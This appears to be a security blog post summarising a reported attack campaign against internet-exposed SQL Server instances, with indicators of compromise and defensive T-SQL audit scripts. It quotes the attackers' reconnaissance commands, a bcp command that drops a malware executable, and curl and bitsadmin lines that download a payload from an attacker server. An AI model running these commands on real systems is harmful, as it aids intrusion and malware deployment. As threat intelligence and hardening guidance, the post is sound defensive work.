Tuesday, March 24, 2026

They Hid Malware in a SQL Table. A weak password and BCP Did the Rest.

BCP. I love it. It's a workhorse — bulk copy data in, bulk copy data out, no drama. I've used it more times than I can count. Which is exactly why this stopped me cold: AhnLab's Security Intelligence Center (ASEC) published a confirmed attack report on March 20, 2026 showing an active threat group using BCP to drop malware directly onto SQL Server hosts. No software flaw. No zero-day. They got through a weak password on an internet-exposed server — and then they weaponized BCP. The simple tool we've all used, doing exactly what it was designed to do, except the 'data' being exported is a malware executable.

Who Is Behind This

ASEC tracks this group as Larva-26002. They've been targeting MS-SQL servers since at least January 2024 — starting with Trigona and Mimic ransomware against internet-exposed instances. Palo Alto Unit42 and Zscaler covered Trigona. Securonix tied Mimic to Turkish-speaking threat actors. In 2025, the same group came back with upgraded tools — Teramind alongside AnyDesk, and a new scanner rebuilt in Rust. Now it's 2026 and they've upgraded again. Same group, same targets, new tooling. This is a long-running, actively maintained operation.

How They Get In

Brute force and dictionary attacks against internet-exposed SQL Server instances with weak or default credentials. That's it. No exploit chain, no CVE. Just hammering logins until one works. Once inside, they run basic reconnaissance first for situational awareness:

hostname
whoami
ipconfig /all
netstat -an
tasklist
tasklist /FI "IMAGENAME eq sqlservr.exe" /FO CSV /NH

Then the Call to BCP

The attacker stores the malware binary inside a database table and then uses BCP to export it to disk as an executable. This is the exact command ASEC documented:

bcp "select binaryTable from uGnzBdZbsi" queryout "C:\ProgramData\api.exe" -T -f "C:\ProgramData\FODsOZKgAU.txt"

Two things to note: the table name uGnzBdZbsi and the format file FODsOZKgAU.txt have not changed since the 2024 incident. ASEC confirmed these identifiers have been consistent across every documented attack cycle from 2024 to date. If you see either of those strings anywhere in your environment, stop whatever you are doing and investigate immediately.

Where BCP isn't available or fails, they fall back to curl, bitsadmin, or PowerShell to pull the payload from an external server:

curl -o "C:\programdata\api.exe" "hxxp://109.205.211[.]13/api.exe"
bitsadmin /transfer job1 /download /priority high "hxxp://109.205.211[.]13/api.exe" "C:\programdata\api.exe"

What Gets Installed

The file dropped at C:\ProgramData\api.exe is a Go-based downloader that ASEC labeled 'ICE Cloud Launcher'. It authenticates to a command-and-control (C&C) server and pulls down the actual payload, 'ICE Cloud Client', also written in Go, which is written to disk under a randomized filename so it passes for a legitimate program.

ICE Cloud Client is a scanner and brute-force tool. It registers with the C&C server, receives a list of MS-SQL addresses to target along with a credential pair to try — they used ecomm/ecomm — and then successful logins go straight back to the C&C server. Your compromised SQL Server is now their scout.

Also interesting: the strings inside the ICE Cloud binaries are in Turkish, clearly tying this 2026 campaign to the earlier Mimic ransomware operation.

The Part That Gets Me The Most

ASEC confirmed that in 2026, Larva-26002 attacked the same servers they compromised in 2024. Not similar servers — the same ones. They came back. Servers that were never properly cleaned up are being revisited on a recurring cycle, each time with the group's latest tooling.

Look at that three-year path: ransomware in 2024, Rust-based scanning in 2025, ICE Cloud scanning in 2026. They've moved away from ransomware toward credential scanning at scale, and they're building a hit list. A growing pool of compromised SQL Servers quietly probing for the next victim.

IOCs to Check Right Now

Everything below comes directly from the ASEC report. Confirmed indicators from the active 2026 campaign:

Type          Value                    Notes
Table name    uGnzBdZbsi               Used to store malware payload since 2024
Format file   FODsOZKgAU.txt           BCP format file, consistent since 2024
Dropped file  C:\ProgramData\api.exe   ICE Cloud Launcher downloader
C&C IP        109.205.211[.]13         Payload download and C&C server
Domain        hostroids[.]com          Associated infrastructure

MD5 hashes for the malware samples are published in the ASEC report.


What Should You Do?

If your SQL Server has any internet exposure — direct or through an application — start here:

Lock down port 1433.

SQL Server should not be reachable from the open internet. Firewall rules should restrict access to known, trusted IP ranges only. If you're not sure what's exposed, find out today.

Audit your SQL logins.

Default and simple credentials are the entry point. Dictionary attacks mean they're trying common passwords. Disable sa if it's not needed. If you have sa enabled with a weak password, or any login with credentials like ecomm/ecomm, change them immediately. Need to find them first? Here's how to find weak passwords using PWDCOMPARE.
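As an added example (not the post's own PWDCOMPARE link and not from the ASEC report), here is one way to run that check: it compares every SQL login's stored hash against a constructed list of weak candidates and against the login name itself, which is what catches an ecomm/ecomm pair. It assumes you run it as sysadmin on the instance.

```sql
-- Added example: find SQL logins with blank, login-name or dictionary passwords.
-- sys.sql_logins only lists SQL-authenticated logins, so Windows logins are not
-- covered here. PWDCOMPARE returns 1 when the clear-text value matches the hash.
DECLARE @candidates TABLE (pwd NVARCHAR(128) NOT NULL);

-- Constructed candidate list: blank, the campaign's 'ecomm' password and a few
-- dictionary staples. Extend it with whatever your own failed-login logs show.
INSERT INTO @candidates (pwd)
VALUES (N''), (N'ecomm'), (N'sa'), (N'password'), (N'Password1'),
       (N'123456'), (N'sql'), (N'admin');

;WITH weak AS (
    -- Hash matches one of the candidate passwords
    SELECT l.name, l.is_disabled, l.is_policy_checked,
           N'matches candidate ''' + c.pwd + N'''' AS finding
    FROM sys.sql_logins AS l
    CROSS JOIN @candidates AS c
    WHERE PWDCOMPARE(c.pwd, l.password_hash) = 1
    UNION ALL
    -- Hash matches the login name itself (the ecomm/ecomm pattern)
    SELECT l.name, l.is_disabled, l.is_policy_checked,
           N'password equals login name' AS finding
    FROM sys.sql_logins AS l
    WHERE PWDCOMPARE(l.name, l.password_hash) = 1
)
SELECT name, is_disabled, is_policy_checked, finding
FROM weak
ORDER BY name, finding;
```

Any row returned is a login to reset now; is_policy_checked = 0 on a hit also tells you the Windows password policy was never enforced for it.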

Review BCP activity.

BCP is legitimate, but it has no business running unattended on a production server outside of a known, documented process. Check all SQL Server Agent jobs and Windows scheduled tasks for all BCP executions — and then verify each one is intended.

Check for the IOC artifacts.

Search for api.exe in C:\ProgramData\, the table name uGnzBdZbsi, and the format file FODsOZKgAU.txt. These strings have not changed across three years of active attacks. Look. For. Them.
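An added hunt script covering the two previous recommendations, BCP activity and IOC artifacts (not code from the post or from ASEC): it looks for the uGnzBdZbsi table in every online database and for SQL Agent job steps that invoke bcp or reference FODsOZKgAU.txt. It assumes sysadmin rights and that the indicators are used verbatim; the api.exe file check stays on the Windows side.

```sql
-- Added example: hunt for the SQL-side indicators called out in the post.

-- 1. Any table named uGnzBdZbsi in any online database on this instance.
DECLARE @hits TABLE (database_name SYSNAME, schema_name SYSNAME, table_name SYSNAME);
DECLARE @db SYSNAME, @sql NVARCHAR(MAX);

DECLARE dbs CURSOR LOCAL FAST_FORWARD FOR
    SELECT name FROM sys.databases WHERE state_desc = 'ONLINE';
OPEN dbs;
FETCH NEXT FROM dbs INTO @db;
WHILE @@FETCH_STATUS = 0
BEGIN
    -- Build a per-database query; QUOTENAME keeps odd database names safe.
    SET @sql = N'SELECT ' + QUOTENAME(@db, '''') + N', s.name, t.name'
             + N' FROM ' + QUOTENAME(@db) + N'.sys.tables AS t'
             + N' JOIN ' + QUOTENAME(@db) + N'.sys.schemas AS s ON s.schema_id = t.schema_id'
             + N' WHERE t.name = N''uGnzBdZbsi'';';
    INSERT INTO @hits EXEC sp_executesql @sql;
    FETCH NEXT FROM dbs INTO @db;
END
CLOSE dbs;
DEALLOCATE dbs;

SELECT 'IOC table present' AS finding, database_name, schema_name, table_name
FROM @hits;

-- 2. Agent job steps that call bcp or reference the campaign's format file.
--    Every row here should map to a known, documented process.
SELECT 'BCP in Agent job' AS finding,
       j.name AS job_name, j.enabled, st.step_id, st.subsystem, st.command
FROM msdb.dbo.sysjobs AS j
JOIN msdb.dbo.sysjobsteps AS st ON st.job_id = j.job_id
WHERE st.command LIKE '%bcp%'
   OR st.command LIKE '%FODsOZKgAU%';
```

Windows scheduled tasks are not visible from T-SQL, so pair this with a Task Scheduler review on the host for the same bcp and format-file strings.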

If you were compromised before and 'cleaned up' — verify.

ASEC confirmed return visits to previously compromised servers. A cleanup that didn't include closing the original entry point, such as weak credentials or an exposed port, was not a full cleanup.

These aren't sophisticated attackers. They're patient ones. A weak password and an open port is all it took. Don't make it that easy for them.

More to Read

AhnLab ASEC: Attack Targeting MS-SQL Servers to Deploy the ICE Cloud Scanner (Larva-26002) — March 20, 2026
AhnLab ASEC: Larva-26002 Trigona and Mimic Ransomware Campaign — January 2024
AhnLab ASEC: Larva-26002 2025 Campaign (Rust-based scanner)
Palo Alto Unit42: Trigona Ransomware Update
Zscaler: Technical Analysis of Trigona Ransomware
Securonix: Turkish Hackers Target MS-SQL Servers with Mimic Ransomware
